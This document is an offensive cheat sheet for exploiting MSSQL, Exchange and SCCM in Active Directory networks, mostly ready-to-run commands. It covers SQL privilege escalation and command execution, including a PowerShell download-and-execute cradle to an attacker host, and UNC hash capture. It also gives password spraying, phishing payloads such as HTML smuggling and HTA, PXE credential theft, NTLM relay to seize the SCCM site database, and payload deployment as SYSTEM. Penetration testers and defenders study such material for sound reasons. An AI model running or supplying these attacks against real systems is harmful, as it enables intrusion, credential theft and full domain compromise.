MSSQL, Exchange & SCCM -- Enterprise Service Exploitation
Enterprise services like MSSQL, Exchange, and SCCM are high-value targets in Active Directory environments. They often hold privileged credentials, allow lateral movement, and can lead to full domain compromise when misconfigured.
| Target | Attack Vector | Impact |
|---|---|---|
| MSSQL | Login impersonation (EXECUTE AS) | sysadmin privilege escalation |
| MSSQL | Trustworthy DB + db_owner | sysadmin privilege escalation |
| MSSQL | UNC path injection (xp_dirtree) | NetNTLMv2 hash capture |
| MSSQL | xp_cmdshell / Agent Job / OLE | RCE on the SQL server |
| MSSQL | Linked servers | Lateral movement + credential extraction |
| Exchange | OWA password spray | Valid credentials |
| Exchange | Phishing (NTLM theft / HTA / smuggling) | Hash capture / RCE |
| Exchange | CVE-2023-23397 / CVE-2023-35636 | NTLM hash theft |
| SCCM | PXE boot media | NAA credentials (initial access) |
| SCCM | Client Push exploitation | NTLM hash of push accounts |
| SCCM | NTLM relay to site DB | Full SCCM admin |
| SCCM | App/Script deployment | RCE as SYSTEM on clients |
MSSQL Server
1. Connection and Authentication
Multiple authentication methods are available depending on access level and platform.
Linux -- impacket-mssqlclient
# SQL Server authentication
impacket-mssqlclient USER:PASS@TARGET_IP
# Windows (domain) authentication
impacket-mssqlclient DOMAIN/USER:PASS@TARGET_IP -windows-auth
# Kerberos authentication
impacket-mssqlclient DOMAIN/USER@TARGET_IP -k -no-pass
# Pass-the-hash
impacket-mssqlclient DOMAIN/USER@TARGET_IP -hashes :NTHASH -windows-auth
Windows -- PowerUpSQL
Import-Module .\PowerUpSQL.psm1
Get-SQLQuery -Instance "TARGET,1433" -Username USER -Password PASS -Query "SELECT SYSTEM_USER"
Tip: Always try
-windows-authif SQL auth fails. Mixed-mode authentication is common but Windows auth may be the only option in domain-joined environments.
2. Database Enumeration
Impacket MSSQLClient Built-in Commands
Use these commands directly in the impacket MSSQL shell for quick enumeration.
SQL> enum_logins # Enumerate logins and roles
SQL> enum_db # Enumerate databases
SQL> enum_users # Enumerate users in current DB
SQL> enum_owner # Enumerate DB owners
SQL> enum_impersonate # Check impersonation permissions
SQL> enum_links # Enumerate linked servers
T-SQL Queries
For more granular enumeration, use raw SQL queries.
-- Enumerate logins with roles
SELECT r.name, r.type_desc, r.is_disabled, sl.sysadmin, sl.securityadmin
FROM master.sys.server_principals r
LEFT JOIN master.sys.syslogins sl ON sl.sid = r.sid
WHERE r.type IN ('S','E','X','U','G');
-- Enumerate databases with owner and trustworthy flag
SELECT a.name AS 'database', b.name AS 'owner', is_trustworthy_on
FROM sys.databases a
JOIN sys.server_principals b ON a.owner_sid = b.sid;
-- Enumerate database users
USE webshop;
EXECUTE sp_helpuser;
-- Check who can be impersonated
SELECT name FROM sys.server_permissions
JOIN sys.server_principals ON grantor_principal_id = principal_id
WHERE permission_name = 'IMPERSONATE';
PowerUpSQL -- Automated Discovery
# Discover MSSQL instances in the domain via SPNs
Get-SQLInstanceDomain -Verbose
# Get server information
Get-SQLServerInfo -Username USER -Password PASS -Instance TARGET
# Run automated security audit
Invoke-SQLAudit -Username USER -Password PASS -Instance TARGET
# Full dump to CSV
Invoke-SQLDumpInfo -Username USER -Password PASS -Instance TARGET
3. Privilege Escalation
Login Impersonation
When a login has IMPERSONATE permission on another login (commonly sa), you can escalate to sysadmin.
-- Check who can be impersonated
SELECT name FROM sys.server_permissions
JOIN sys.server_principals ON grantor_principal_id = principal_id
WHERE permission_name = 'IMPERSONATE';
-- Impersonate the sa login
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER; -- confirm: should return 'sa'
-- Revert when done
REVERT;
Via impacket:
SQL> exec_as_login sa
SQL> SELECT SYSTEM_USER;
Trustworthy Database + db_owner
This technique requires three conditions: the database is marked TRUSTWORTHY, your user has db_owner role in that database, and the database is owned by sa.
-- Step 1: Verify trustworthy flag
SELECT name, is_trustworthy_on FROM sys.databases;
-- Step 2: Switch to the trustworthy DB and impersonate a db_owner user
USE webshop;
EXECUTE AS LOGIN = 'ws_user';
SELECT IS_ROLEMEMBER('db_owner'); -- must return 1
-- Step 3: Create a stored procedure that grants sysadmin
CREATE PROCEDURE sp_privesc
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'ws_dev', 'sysadmin'
GO
EXECUTE sp_privesc;
DROP PROCEDURE sp_privesc;
-- Step 4: Verify escalation
REVERT;
SELECT IS_SRVROLEMEMBER('sysadmin'); -- should return 1
Automated with PowerUpSQL:
Invoke-SQLEscalatePriv -Username USER -Password PASS -Instance TARGET -Verbose
4. UNC Path Injection (Hash Capture)
Force the MSSQL server to authenticate to your listener, capturing the service account's NetNTLMv2 hash. No sysadmin required for some methods.
Start a listener:
sudo responder -I tun0 -v
Trigger from the MSSQL session:
EXEC xp_dirtree '\\ATTACKER_IP\share';
-- or
EXEC xp_subdirs '\\ATTACKER_IP\share';
-- or
EXEC xp_fileexist '\\ATTACKER_IP\share';
Via impacket:
SQL> xp_dirtree \\ATTACKER_IP\share
Crack the captured hash:
hashcat -m 5600 hash.txt ~/tools/wordlists/rockyou.txt
Tip: If the MSSQL service runs as a domain user account, the captured hash may be crackable or relayable for lateral movement. Default
NT SERVICE\MSSQLSERVERaccounts are less useful for domain attacks but still grant SeImpersonatePrivilege on the host.
5. Command Execution
All command execution methods require sysadmin privileges. If you do not have sysadmin yet, escalate first using impersonation or the trustworthy DB technique.
xp_cmdshell (Most Common)
The most straightforward method. Requires enabling the feature first.
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Execute commands
EXEC xp_cmdshell 'whoami';
-- Disable after use (cleanup)
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
Via impacket:
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
SQL> disable_xp_cmdshell
SQL Agent Job (Blind Execution)
Useful when xp_cmdshell is monitored. Requires the SQL Server Agent service to be running.
USE msdb;
EXEC sp_add_job @job_name = N'Malicious Job';
EXEC sp_add_jobstep @job_name = N'Malicious Job',
@step_name = N'Execute',
@subsystem = N'PowerShell',
@command = N'(New-Object Net.WebClient).DownloadString("http://ATTACKER_IP/payload")|IEX;',
@retry_attempts = 5, @retry_interval = 5;
EXEC sp_add_jobserver @job_name = N'Malicious Job';
EXEC sp_start_job @job_name = N'Malicious Job';
Via impacket (auto-cleanup):
SQL> sp_start_job cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"
Tip: Agent Jobs execute blindly -- there is no direct output. Write results to a file or exfiltrate via HTTP.
OLE Automation
Alternative when xp_cmdshell and Agent Jobs are unavailable. Also blind execution.
-- Enable OLE Automation
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'ole automation procedures', 1; RECONFIGURE;
-- Execute command
DECLARE @objShell INT;
EXEC sp_OACreate 'wscript.shell', @objShell Output;
EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';
-- Cleanup
EXEC sp_configure 'ole automation procedures', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
PowerUpSQL Wrappers
# xp_cmdshell
Invoke-SQLOSCmd -Username USER -Password PASS -Instance TARGET -Command "whoami"
# Agent Job
Invoke-SQLOSCmdAgentJob -Username USER -Password PASS -Instance TARGET -SubSystem CmdExec -Command "whoami"
# OLE Automation
Invoke-SQLOSCmdOle -Username USER -Password PASS -Instance TARGET -Command "whoami"
6. Linked Servers
Linked servers allow a SQL Server to execute queries on remote database servers. They often use stored credentials and can be chained for lateral movement.
Discovery
EXEC sp_linkedservers;
SQL> enum_links
Executing Queries on Linked Servers
-- Using OPENQUERY (read data)
SELECT * FROM OPENQUERY(SQL02, 'SELECT name FROM sys.databases');
-- Check if you have sysadmin on the linked server
SELECT * FROM OPENQUERY(SQL02, 'SELECT IS_SRVROLEMEMBER(''sysadmin'')');
-- Using EXECUTE AT (full RCE capability)
EXECUTE ('EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami";') AT SQL02;
Via impacket (handles link hopping automatically):
SQL> use_link SQL02
SQL >SQL02> xp_cmdshell whoami
SQL >SQL02> use_link localhost # return to original server
PowerUpSQL -- Link Crawl
Recursively maps all linked servers in the chain.
# Map all links recursively
Get-SqlServerLinkCrawl -Username USER -Password PASS -Instance TARGET
# Execute query across all links
$Out = Get-SQLServerLinkCrawl -Username USER -Password PASS -Instance TARGET -Query "SELECT SYSTEM_USER"
foreach ($Server in $Out) { $Server.CustomQuery | ForEach-Object { Write-Host($_.Item(0)) } }
Extracting Linked Server Credentials (Post-Exploitation)
Requires sysadmin and local admin on the SQL server. Connect via DAC (Dedicated Admin Connection).
-- Extract linked server credential hashes
SELECT sysservers.srvname, syslnklgns.name, syslnklgns.pwdhash
FROM master.sys.syslnklgns
INNER JOIN master.sys.sysservers ON syslnklgns.srvid = sysservers.srvid
WHERE LEN(pwdhash) > 0;
-- Extract Service Master Key (needed for decryption)
SELECT * FROM sys.key_encryptions;
# Automated extraction (NetSPI module)
Import-Module .\Get-MSSQLLinkPasswords.psm1
Get-MSSQLLinkPasswords
7. Host Privilege Escalation (SeImpersonatePrivilege)
MSSQL services run with SeImpersonatePrivilege by default. After getting command execution via xp_cmdshell, escalate to SYSTEM using Potato attacks.
| Service Account | Default Privilege |
|---|---|
| NT SERVICE\MSSQLSERVER | SeImpersonatePrivilege |
| NT SERVICE\SQLSERVERAGENT | SeImpersonatePrivilege |
| Domain user (custom) | Hash capturable via UNC, potential domain privesc |
# After getting a shell via xp_cmdshell, use a Potato attack
# GodPotato, PrintSpoofer, JuicyPotatoNG, etc.
SQL> xp_cmdshell "C:\Windows\Tasks\GodPotato.exe -cmd whoami"
Tip: If the service runs as a domain user instead of the default service account, focus on capturing that hash via UNC path injection rather than Potato attacks.
Microsoft Exchange
8. Version Detection and Enumeration
Detecting Exchange Version
Use the eDiscovery endpoint to identify the exact Exchange build number.
# Extract version from eDiscovery endpoint
curl -k https://TARGET/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application \
| xmllint --format - | grep version
Cross-reference the build number with the Microsoft Exchange build numbers page.
NTLM Endpoint Enumeration
# Scan for endpoints exposing NTLM authentication
python3 ntlmscan.py --host https://TARGET_IP
# Nmap NTLM info extraction
sudo nmap -sV --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p443 TARGET_IP
Tip: NTLM endpoints reveal internal hostnames, domain names, and sometimes the DNS forest name -- useful for mapping the environment.
9. Username Enumeration
Generating Username Wordlists
# Generate possible usernames from a list of names
./username-anarchy --input-file names.txt
Extracting the Global Address List (GAL)
The GAL contains all email-enabled objects in the organization.
From Linux:
python3 emailextract.py -i exch01.domain.local -u user@domain.local -p 'PASS'
From Windows using MailSniper:
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/MailSniper.ps1')
Get-GlobalAddressList -ExchHostname exch01.domain.local -Username user -Password 'PASS' -OutFile gal.txt
10. Password Spraying
Use valid usernames from the GAL dump to spray against OWA/ECP.
From Linux:
./ruler-linux64 --domain domain.local --insecure brute \
--users users.txt --passwords passwords.txt -a 4
From Windows:
# Spray against OWA
Invoke-PasswordSprayOWA -ExchHostname exch01.domain.local \
-UserList usernames.txt -Password "Password2024!" -OutFile creds.txt
# Always check lockout policy first
(Get-DomainPolicy)."SystemAccess"
# LockoutBadCount = 0 means no lockout
Tip: Always check the lockout threshold before spraying. A value of 0 means no lockout, but be cautious -- some organizations use third-party lockout solutions that do not appear in the default policy.
11. Phishing Techniques
NTLM Hash Theft via Email
Generate documents that force NTLM authentication when opened by the victim.
# Generate hash theft payloads (supports 21 file types)
python3 ntlm_theft.py -g htm -s ATTACKER_IP -f payload
# Start responder to capture hashes
sudo responder -I tun0
Send the .htm file as an email attachment. When the user opens it, their NetNTLMv2 hash is captured.
Credential Prompt via Responder HTTP
# Start responder with HTTP listener
sudo responder -I tun0
# Send email containing a hyperlink to http://ATTACKER_IP/
# When the user clicks, they get a credential prompt
HTA Server (Metasploit)
HTA files execute directly in Windows without download warnings in older environments.
msfconsole -x "use exploit/windows/misc/hta_server; \
set LHOST ATTACKER_IP; set LPORT 8443; \
set SRVHOST ATTACKER_IP; run -j"
# Send the generated link via email
HTML Smuggling
Embeds a payload inside HTML that auto-downloads when opened in a browser. Bypasses email gateway scanning.
<script>
var file='<BASE64_ENCODED_EXE>';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'policies.doc';
a.click();
</script>
CVE-2023-23397 (Outlook NTLM Theft via Reminder)
A critical Outlook vulnerability that triggers NTLM authentication without user interaction. The victim only needs to receive the appointment -- no click required.
Appointment -> Reminder -> Sound -> \\ATTACKER_IP\academy.wav
Tip: CVE-2023-23397 requires the Outlook desktop client (not OWA). It triggers when the reminder fires, which happens automatically when the appointment time arrives.
SCCM (System Center Configuration Manager)
12. Architecture Overview
Understanding SCCM architecture is critical for identifying attack paths.
| Component | Role |
|---|---|
| Primary Server | Central management server for the SCCM site |
| MSSQL Database | Stores all configuration and inventory data (may be on a separate server) |
| SMS Provider | Interface between the SCCM service and DB (WMI + AdminService API) |
| Distribution Point (DP) | Distributes applications, scripts, and packages to clients |
| Management Point (MP) | Orchestrates client configuration and communication |
| Client Push Account | Service account with local admin on all managed endpoints |
Deployment methods: Client Push (default, least secure), Software Update, Group Policy, Manual, Logon Script, Package.
Tip: When the MSSQL database or SMS Provider is on a separate server from the Primary Server, NTLM relay attacks become possible. This is the most common SCCM takeover path.
13. PXE Boot Initial Access
When PXE boot is enabled, boot media can be intercepted to extract Network Access Account (NAA) credentials.
Prerequisites: PXE server exposed (UDP ports 67, 68, 69, 4011).
Extracting PXE Boot Media
# Enumerate PXE boot media
python .\pxethief.py 2 DP_IP
# Download boot variables via TFTP
tftp -i DP_IP GET "\SMSTemp\TIMESTAMP.{GUID}.boot.var" "boot.var"
# Extract hash for offline cracking
python .\pxethief.py 5 '.\boot.var'
# Output format: $sccm$aes128$...
Cracking the Media Password
hashcat -m 19850 --force -a 0 hash ~/tools/wordlists/rockyou.txt
Decrypting NAA Credentials
# Decrypt media and extract NAA credentials
python .\pxethief.py 3 '.\boot.var' "CrackedPassword"
# Output: Network Access Account username/password
# Output: Task Sequence credentials (OSDJoinAccount)
14. Credential Harvesting
DPAPI Secrets via sccmhunter (Requires Admin on SCCM Server)
Extracts NAA credentials, Task Sequence variables, and Collection Variables from DPAPI-protected storage.
# Via WMI repository
python3 sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target SCCM_IP -wmi
# Via OBJECTS.DATA on disk (includes deleted secrets)
python3 sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target SCCM_IP -disk
# Both methods
python3 sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target SCCM_IP -both
HTTP Policy Request (No Admin Required)
Only requires a computer account in the domain. Recovers NAA credentials by requesting machine policies from the Management Point.
# Create a computer account (if MAQ > 0)
addcomputer.py -computer-name 'PWNED$' -computer-pass 'Pass123' \
-dc-ip DC_IP 'DOMAIN/USER:PASS'
# Recover NAA via policy request
python3 sccmhunter.py http -u USER -p PASS -dc-ip DC_IP \
-cn 'PWNED$' -cp 'Pass123'
15. Client Push Exploitation
When Client Push Installation is enabled, the SCCM server uses a high-privilege service account to connect to endpoints. By forcing a push to a machine you control, you capture that account's NTLM hash.
Prerequisites: NTLM not disabled, HTTPS not enforced, KB15599094 not applied.
# Terminal 1: Start Inveigh to capture NTLM hashes
.\Inveigh.exe
# Terminal 2: Force client push to your machine
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP
The captured hash (client push account + machine account) can be cracked or relayed to other targets.
16. Site Takeover via NTLM Relay
Relay to MSSQL Site Database
When the MSSQL database is on a separate server from the Primary Server, relay the SCCM server's machine account to the database to gain full SCCM admin.
# Step 1: Setup NTLM relay targeting the MSSQL server
ntlmrelayx.py -t "mssql://SQL_IP" -smb2support -socks
# Step 2: Coerce authentication from the SCCM server
python3 PetitPotam.py -u USER -p 'PASS' -d DOMAIN ATTACKER_IP SCCM_IP
# Step 3: Connect via SOCKS proxy to MSSQL
proxychains4 -q impacket-mssqlclient 'DOMAIN/SCCM01$'@SQL_IP -windows-auth -no-pass
Once connected, add yourself as a Full Administrator in the SCCM database:
USE CM_HTB;
-- Insert admin record (replace SID_BINARY with your user's SID)
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite)
VALUES (0xSID_BINARY,'DOMAIN\USER',0,0,'','','','','SITECODE');
-- Grant Full Administrator permissions (use the AdminID from above)
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (NEW_ID,'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (NEW_ID,'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (NEW_ID,'SMS0001R','SMS00004','1');
Relay to SMS Provider (AdminService API)
When the SMS Provider is on a separate server, relay to the AdminService API to add yourself as admin directly.
# Setup relay targeting AdminService (requires impacket fork with SCCM relay support)
ntlmrelayx.py -t https://SMS_IP/AdminService/wmi/SMS_Admin -smb2support \
--adminservice --logonname "DOMAIN\USER" --displayname "DOMAIN\USER" \
--objectsid S-1-5-21-...-RID
# Coerce authentication
python3 PetitPotam.py -u USER -p 'PASS' -d DOMAIN ATTACKER_IP SCCM_IP
# Success: "Server returned code 201, attack successful"
Relay from Passive Site Server
# Relay the passive server's machine account to the Primary Server
ntlmrelayx.py -t SCCM_PRIMARY_IP -smb2support -socks
# Coerce the passive server
python3 PetitPotam.py -u USER -p 'PASS' -d DOMAIN ATTACKER_IP PASSIVE_SCCM_IP
# Dump secrets via SOCKS
proxychains4 -q secretsdump.py 'DOMAIN/SCCM02$'@SCCM_PRIMARY_IP -no-pass
17. Post-Exploitation (Application and Script Deployment)
Once you have SCCM Full Administrator access, deploy applications or scripts to execute as SYSTEM on any managed client.
Enumeration via sccmhunter
python3 sccmhunter.py admin -u USER -p PASS -ip SMS_PROVIDER_IP
# Inside the admin shell:
show_admins # List all SCCM admins
get_device HOSTNAME # Get device info (ResourceId)
interact RESOURCE_ID # Interact with a specific device
administrators # List local admins on the device
ls # List files on the device
Application Deployment (SharpSCCM)
# 1. Create application pointing to your payload
.\SharpSCCM.exe new application -s -n APP_NAME -p \\ATTACKER_IP\share\payload.exe -sms SMS_IP
# 2. Create a device collection
.\SharpSCCM.exe new collection -n "COLLECTION" -t device -sms SMS_IP
# 3. Add target device to the collection
.\SharpSCCM.exe new collection-member -d TARGET_HOST -n "COLLECTION" -t device -sms SMS_IP
# 4. Deploy the application
.\SharpSCCM.exe new deployment -a APP_NAME -c "COLLECTION" -sms SMS_IP
# 5. Force policy update (optional, speeds up deployment)
.\SharpSCCM.exe invoke update -n "COLLECTION" -sms SMS_IP
Script Deployment (sccmhunter)
# Prepare the script payload
echo 'whoami;hostname' > cmd.txt
# Launch admin shell with a second admin account for script approval
python3 sccmhunter.py admin -u USER -p PASS -ip SMS_IP \
-au 'PWNED$' -ap ComputerPass123
# Inside the admin shell:
interact RESOURCE_ID
script /path/to/cmd.txt
# Output: nt authority\system
Tip: SCCM requires a different admin account to approve scripts than the one that created them. Use
add_admin PWNED$ SIDin sccmhunter to promote a computer account as the second admin.
sccmhunter Quick Reference
# Discovery
sccmhunter.py find -u USER -p PASS -d DOMAIN -dc-ip DC_IP
sccmhunter.py show -all
# SMB enumeration
sccmhunter.py smb -u USER -p PASS -d DOMAIN -dc-ip DC_IP -save
# HTTP policy extraction (NAA credentials)
sccmhunter.py http -u USER -p PASS -dc-ip DC_IP -cn 'COMPUTER$' -cp PASS
# DPAPI secrets
sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target TARGET -wmi
# Admin shell
sccmhunter.py admin -u USER -p PASS -ip SMS_IP
sccmhunter.py admin -u USER -p HASH -ip SMS_IP # pass-the-hash
Tools Reference
| Tool | Purpose | Platform |
|---|---|---|
| impacket-mssqlclient | MSSQL shell, enumeration, privesc, linked servers | Linux |
| PowerUpSQL | Automated MSSQL audit, enumeration, exploitation | Windows |
| MailSniper | Exchange GAL dump, password spraying | Windows |
| Ruler | Exchange autodiscover, brute force | Linux |
| ntlmscan | Exchange NTLM endpoint enumeration | Linux |
| ntlm_theft | Generate 21 types of hash theft documents | Linux |
| PXEThief | PXE boot media credential extraction | Windows |
| sccmhunter | SCCM enumeration, admin, DPAPI, HTTP policy | Linux |
| SharpSCCM | SCCM enumeration, app deploy, client push abuse | Windows |
| Inveigh | NTLM hash capture (SMB/HTTP) | Windows |
Attack Chains
MSSQL to Domain Admin
SQL creds -> impersonate sa -> xp_cmdshell -> reverse shell
-> SeImpersonatePrivilege -> SYSTEM -> domain creds (secretsdump)
MSSQL Linked Server Chain
SQL01 (low-priv) -> exec_as_login sa -> use_link SQL02
-> xp_cmdshell on SQL02 -> pivot to new network segment
Exchange to Domain Compromise
OWA password spray -> valid creds -> phishing (NTLM hash theft)
-> relay or crack hash -> lateral movement -> domain admin
SCCM PXE to Domain Admin
PXE boot interception -> crack media password -> NAA creds
-> domain access -> SCCM admin escalation -> SYSTEM on any client
SCCM Takeover via NTLM Relay
Coerce SCCM server auth -> relay to MSSQL site DB -> INSERT admin
-> deploy scripts -> SYSTEM on any managed client
SCCM Client Push to Domain
SharpSCCM client-push -> capture push account NTLM hash
-> relay to DC or other targets -> domain compromise